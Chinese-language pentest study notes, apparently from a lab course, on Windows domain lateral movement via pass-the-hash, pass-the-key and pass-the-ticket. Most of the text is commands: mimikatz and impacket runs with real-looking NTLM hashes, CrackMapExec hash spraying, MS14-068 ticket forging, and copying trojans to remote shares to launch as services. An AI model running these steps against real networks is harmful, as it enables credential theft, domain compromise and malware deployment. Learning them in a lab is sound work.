内网安全-横向移动-pth&ptk&ptt

• 基于凭证

  • pth（pass the hash）

    • 原理

      • PTH在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务，而不用提供明文密码（impaket的各种协议）

      • 如果禁用了ntlm认证，PsExec无法利用获得的ntlm hash进行远程连接，但是使用mimikatz还是可以攻击成功。（mimikatz）

    • mimikatz的hash传递攻击

      • 先提权

      • mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.21 /ntlm:ccef208c6485269c20db2cad21734fe7（这条语句输入完 会在被控主机30的电脑界面弹出一个shell）

      • 下面的操作都是在该shell下执行的

      • net use \\192.168.3.21\c$ （尝试与21主机建立c盘文件的共享连接）

      • copy cws.exe \\192.168.3.21\c$(把30主机的木马复制到21主机)

      • sc \\192.168.3.21 create bshell binpath= "c:\tool\cws.exe"（创建服务 路径为木马的路径）（在21主机的计算机管理-服务和应用程序-服务-bshell查看是否创建）

      • sc \\192.168.3.21 start bshell （启动服务 也就是启动木马-会成功上线）

        • 不知道为啥启动服务失败

    • impacket-at&ps&wmi&smb

      • atexec

      • psexec

        • psexec -hashes :NTLM值 域名/域用户@域内ip地址

      • wmi

        • wmiexec -hashes :NTLM值 域名/域用户@域内ip地址

      • smb

        • smbexec -hashes :NTLM值 域名/域用户@域内ip地址

      • 这些协议也有对应的py版本 可以配置代理去本机执行

        • 具体看上面的基于协议的笔记

    • Proxychains&CrackMapExec 代理+密码喷射

      • 建立socks连接，设置socks代理，配置规则，调用

      • 代理配置：Proxychains.conf

      • 密码喷射-域用户登录PTH：

        • 域用户hash登录

          • proxychains python cme smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c

        • 本地用户hash登录

          • proxychains python cme smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth

  • ptk

    • 原理及利用条件

      • 对于8.1/2012r2，安装补丁kb2871997的Win 7/2008r2/8/2012等，可以使用AES keys代替NT hash来实现ptk攻击

        • pth：没打补丁用户都可以连接，打了补丁只能administrator连接

        • ptk：打了补丁才能用户都可以连接，采用aes256连接

        • 当系统安装了KB2871997补丁且禁用了NTLM的时候， 那我们抓取到的ntlm hash也就失去了作用，但是可以通过PTK的攻击方式获得权限

      • 鸡肋：因为只有禁用了NTLM才能利用 而且还要打了补丁

    • mimikatz sekurlsa::ekeys （获取aes256值）

    • mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值

  • ptt

    • 漏洞-MS14068(webadmin权限)-利用漏洞生成的用户的新身份票据尝试认证

      • 原理

        • MS14-068是密钥分发中心（KDC）服务中的Windows漏洞。 它允许经过身份验证的用户在其Kerberos票证（TGT）中插入任意PAC。 该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。 用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证

        • 伪造域管TGT 利用该漏洞 伪造用户身份tgt票据（类似web的cookie伪造） 条件：取得一个域内用户权限即可

      • 获取SID值：shell whoami/user

      • 根据sid值生成票据文件：shell ms14-068.exe -u fileadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p Admin12345

        • （查看票据：shell klist）

        • （清除票据连接：shell klist purge）

        • -p 是指fileadmin的密码

      • 内存导入票据：mimikatz kerberos::ptc TGT_fileadmin@god.org.ccache

      • 连接目标上线：shell dir \\OWA2010CN-GOD\c$

        • shell net use \\OWA2010CN-GOD\C$

        • copy beacon.exe \\OWA2010CN-GOD\C$

        • sc \\OWA2010CN-GOD create bindshell binpath= "c:\ncws.exe"

        • sc \\OWA2010CN-GOD start bindshell

      • 注意：成功不成功看DC域控漏洞补丁打没打

    • kekeo(高权限，需NTLM)-利用获取的NTLM生成新的票据尝试认证

      • 原理及条件

        • 因为当前主机肯定之前与其他主机连接过，所以本地应该生成了一些票据， 我们可以导出这些票据，然后再导入票据，利用。该方法类似于cookie欺骗

        • 缺点：票据是有有效期的，所以如果当前主机在连接过域控的话，有效期内可利用。

        • 注意：成功不成功看ntlm哈希值的正确性

      • 利用

        • 生成票据（可以理解为请求票据把他生成到桌面）：shell kekeo "tgt::ask /user:Administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7" "exit"

        • 导入票据：shell kekeo "kerberos::ptt TGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi" "exit"

        • 查看票据：shell klist

        • 利用票据连接：shell dir \\owa2010cn-god\c$

    • mimikatz(高权限,需Ticket)-利用历史遗留的票据重新认证尝试

      • 注意需要高权限（mimikatz需要高权限 ）并且需要该主机有被想要连接的主机所登录过

      • 导出票据： mimikatz sekurlsa::tickets /export

      • 导入票据： mimikatz kerberos::ptt C:\Users\webadmin\Desktop\[0;2ba64c]-2-0-40e00000-Administrator@krbtgt-god.org.kirbi

        • [0;2ba64c]-2-0-40e00000-Administrator@krbtgt-god.org.kirbi （这个文件会生成在桌面上 自己根据生成的名字去输入）

      • 查看票据：shell klist

      • 利用票据连接：shell dir \\owa2010cn-god\c$